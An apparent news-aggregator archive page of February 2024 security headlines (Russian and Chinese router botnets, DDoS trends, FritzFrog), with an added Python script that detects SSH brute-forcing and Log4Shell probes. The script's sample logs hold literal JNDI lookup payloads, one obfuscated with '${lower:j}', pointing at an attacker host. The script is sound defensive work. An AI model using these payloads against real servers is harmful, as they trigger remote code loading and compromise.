Monthly Archives: February 2024

That home router botnet the Feds took down? Moscow’s probably going to try again

Non-techies told to master firmware upgrades and firewall rules. For the infosec hardheads: have some IOCs

Authorities from eleven nations have delivered a sequel to the January takedown of a botnet run by Russia on compromised Ubiquiti Edge OS routers – in the form of a warning that Russia may try again, so owners of the devices should take precautions.…

More:
That home router botnet the Feds took down? Moscow’s probably going to try again

U.S. authorities disrupt Russian intelligence’s botnet

In January 2024, an operation dismantled a network of hundreds of SOHO routers controlled by GRU Military Unit 26165, also known as APT28, Sofacy Group, Forest Blizzard, Pawn Storm, Fancy Bear, and Sednit. This network facilitated various crimes, including extensive spearphishing and credential harvesting against entities of interest to the Russian government, such as U.S. and foreign governments, military, and key security and corporate sectors. This botnet was distinct from prior GRU and Russian … More → The post U.S. authorities disrupt Russian intelligence’s botnet appeared first on Help Net Security.

See more here:
U.S. authorities disrupt Russian intelligence’s botnet

Cybersecurity sectors adjust as DDoS attacks reach new heights

In this Help Net Security video, Andrey Slastenov, Head of Security Department at Gcore, discusses the findings of their latest report that provide insights into the current state of the DDoS protection market and cybersecurity trends. Key highlights from Q3–Q4 2023: The maximum attack power rose from 800 Gbps (1H 2023) to 1.6 Tbps. UDP floods constitute 62% of DDoS attacks. TCP floods and ICMP attacks remain popular at 16% and 12% respectively and SYN, … More → The post Cybersecurity sectors adjust as DDoS attacks reach new heights appeared first on Help Net Security.

Follow this link:
Cybersecurity sectors adjust as DDoS attacks reach new heights

Feds dismantle Russian GRU botnet built on 1,000-plus home, small biz routers

Beijing, now Moscow.… Who else is hiding in broadband gateways?

The US government today said it disrupted a botnet that Russia’s GRU military intelligence unit used for phishing expeditions, spying, credential harvesting, and data theft against American and foreign governments and other strategic targets.…

Read More:
Feds dismantle Russian GRU botnet built on 1,000-plus home, small biz routers

Fortinet’s week to forget: Critical vulns, disclosure screw-ups, and that toothbrush DDoS attack claim

An orchestra of fails for the security vendor

We’ve had to write the word “Fortinet” so often lately that we’re considering making a macro just to make our lives a little easier after what the company’s reps will surely agree has been a week sent from hell.…

Taken from:
Fortinet’s week to forget: Critical vulns, disclosure screw-ups, and that toothbrush DDoS attack claim

FBI: Give us warrantless Section 702 snooping powers – or China wins

Never mind the court orders obtained to thwart Volt Typhoon botnet

Analysis: The FBI’s latest PR salvo, as it fights to preserve its warrantless snooping powers on Americans via FISA Section 702, is more big talk of cyberattacks by the Chinese government.…

Read More:
FBI: Give us warrantless Section 702 snooping powers – or China wins

DDoS attack power skyrockets to 1.6 Tbps

DDoS attack trends for the second half of 2023 reveal alarming developments in their scale and sophistication, according to Gcore. The maximum attack power rose from 800 Gbps (1H 2023) to 1.6 Tbps. UDP floods continue to dominate, constituting 62% of DDoS attacks. TCP floods and ICMP attacks also remain popular at 16% and 12% of the total, respectively. All other DDoS attack types, including SYN, SYN+ACK flood, and RST Flood, accounted for a mere … More → The post DDoS attack power skyrockets to 1.6 Tbps appeared first on Help Net Security.

See more here:
DDoS attack power skyrockets to 1.6 Tbps

FritzFrog botnet exploits Log4Shell, PwnKit vulnerabilities

The FritzFrog cryptomining botnet has new potential for growth: a recently analyzed variant of the bot is exploiting the Log4Shell (CVE-2021-44228) and PwnKit (CVE-2021-4034) vulnerabilities for lateral movement and privilege escalation.

The FritzFrog botnet

The FritzFrog botnet, initially identified in August 2020, is a peer-to-peer (rather than centrally-controlled) botnet powered by malware written in Go. It targets SSH servers by brute-forcing login credentials, and has managed to compromise thousands of them worldwide. “Each compromised host … More → The post FritzFrog botnet exploits Log4Shell, PwnKit vulnerabilities appeared first on Help Net Security.

Excerpt from:
FritzFrog botnet exploits Log4Shell, PwnKit vulnerabilities
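The FritzFrog excerpt above names two behaviours a defender can actually look for on a host: SSH password brute-forcing, and Log4Shell requests used for lateral movement. The script below is an added example, not code from the Help Net Security article or from the FritzFrog analysis it cites. It runs simple detection logic over constructed sshd and HTTP access-log lines; the sample lines, the IP addresses, the five-failures-per-minute threshold, the assumed log year and the log layouts are all assumptions, not FritzFrog indicators.

```python
"""Host-side detection of two FritzFrog behaviours: SSH credential brute-forcing
and Log4Shell (CVE-2021-44228) probing. Sample logs, thresholds and field
layouts below are assumptions constructed for this example, not FritzFrog IOCs.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd lines in the default rsyslog layout (timestamp carries no year).
AUTH_LOG = """\
Feb 12 03:14:01 web01 sshd[2101]: Failed password for invalid user admin from 198.51.100.23 port 51812 ssh2
Feb 12 03:14:02 web01 sshd[2103]: Failed password for root from 198.51.100.23 port 51820 ssh2
Feb 12 03:14:02 web01 sshd[2105]: Failed password for invalid user oracle from 198.51.100.23 port 51831 ssh2
Feb 12 03:14:03 web01 sshd[2107]: Failed password for invalid user test from 198.51.100.23 port 51844 ssh2
Feb 12 03:14:04 web01 sshd[2109]: Failed password for invalid user ubuntu from 198.51.100.23 port 51850 ssh2
Feb 12 03:14:05 web01 sshd[2111]: Failed password for root from 198.51.100.23 port 51863 ssh2
Feb 12 03:14:07 web01 sshd[2113]: Accepted password for root from 198.51.100.23 port 51870 ssh2
Feb 12 03:20:11 web01 sshd[2200]: Failed password for alice from 192.0.2.10 port 40120 ssh2
Feb 12 03:20:19 web01 sshd[2202]: Accepted publickey for alice from 192.0.2.10 port 40121 ssh2
"""

# Constructed HTTP access-log lines ("combined" format). The JNDI strings sit in
# the request path and the User-Agent, fields a vulnerable app is likely to hand
# to Log4j; the third line wraps "j" in ${lower:} to dodge a naive grep.
ACCESS_LOG = """\
198.51.100.23 - - [12/Feb/2024:03:30:44 +0000] "GET /api/health HTTP/1.1" 200 17 "-" "${jndi:ldap://198.51.100.23:1389/a}"
10.0.0.4 - - [12/Feb/2024:03:31:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.23 - - [12/Feb/2024:03:31:07 +0000] "GET /login?user=${${lower:j}ndi:rmi://198.51.100.23:1099/x} HTTP/1.1" 404 0 "-" "curl/7.81.0"
"""

SSHD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>[\d.]+) port \d+"
)
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Log4j 2 lookups attackers wrap around "jndi": ${lower:j}, ${upper:J}, ${::-j}.
OBFUSCATION_RE = re.compile(
    r"\$\{(?:lower|upper):([^{}]*)\}|\$\{::-([^{}]*)\}", re.IGNORECASE
)


def parse_syslog_ts(ts: str, year: int = 2024) -> datetime:
    """Syslog timestamps omit the year; the caller supplies it (assumed 2024 here)."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_ssh_bruteforce(log_text: str, threshold: int = 5, window_s: int = 60) -> dict:
    """Return {src_ip: {...}} for sources with >= threshold failed logins inside a
    window_s-second sliding window. success_after marks a later accepted login
    from the same source, i.e. a brute-force that probably landed."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = SSHD_RE.match(line)
        if m:
            events[m["src"]].append((parse_syslog_ts(m["ts"]), m["result"], m["user"]))

    alerts = {}
    for src, evs in events.items():
        evs.sort()
        fails = [e for e in evs if e[1] == "Failed"]
        burst_end = None
        lo = 0
        for hi in range(len(fails)):
            while (fails[hi][0] - fails[lo][0]).total_seconds() > window_s:
                lo += 1
            if hi - lo + 1 >= threshold:
                burst_end = fails[hi][0]
                break
        if burst_end is None:
            continue
        alerts[src] = {
            "failures": len(fails),
            "users": sorted({e[2] for e in fails}),
            "success_after": any(e[1] == "Accepted" and e[0] >= burst_end for e in evs),
        }
    return alerts


def normalize_lookups(s: str) -> str:
    """Collapse lower/upper/::- lookup wrappers until none remain, so
    ${${lower:j}ndi:...} becomes ${jndi:...}."""
    prev = None
    while prev != s:
        prev = s
        s = OBFUSCATION_RE.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), s
        )
    return s


def detect_log4shell(log_text: str) -> list:
    """Return (src_ip, line) for every HTTP log line carrying a JNDI lookup after
    de-obfuscation. The whole line is checked, so referer and UA are covered."""
    return [(line.split(" ", 1)[0], line)
            for line in log_text.splitlines()
            if JNDI_RE.search(normalize_lookups(line))]


if __name__ == "__main__":
    for src, info in detect_ssh_bruteforce(AUTH_LOG).items():
        print(f"ssh brute force from {src}: {info}")
    for src, line in detect_log4shell(ACCESS_LOG):
        print(f"log4shell probe from {src}: {line[:80]}")
```

The signal worth paging on is `success_after`: a burst of failures followed by an accepted login from the same address is the brute-force that worked, which is how the article says FritzFrog gets its initial foothold. The JNDI normaliser only unwraps the `lower`, `upper` and `::-` lookups; URL-encoded or otherwise encoded payloads need decoding before this check. PwnKit is a local privilege escalation and leaves nothing in network logs, so for that one the check is the installed pkexec patch level, not a log search.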

FBI disrupts Chinese botnet used for targeting US critical infrastructure

The FBI has disrupted the KV botnet, used by People’s Republic of China (PRC) state-sponsored hackers (aka “Volt Typhoon”) to target US-based critical infrastructure organizations.

A botnet for probing critical infrastructure organizations

The threat actors used the KV botnet malware to hijack hundreds of US-based, privately-owned small office/home office (SOHO) routers and to hide their hacking activity towards “US and other foreign victims”. “The Volt Typhoon malware enabled China to hide, among other things, pre-operational … More → The post FBI disrupts Chinese botnet used for targeting US critical infrastructure appeared first on Help Net Security.

More here:
FBI disrupts Chinese botnet used for targeting US critical infrastructure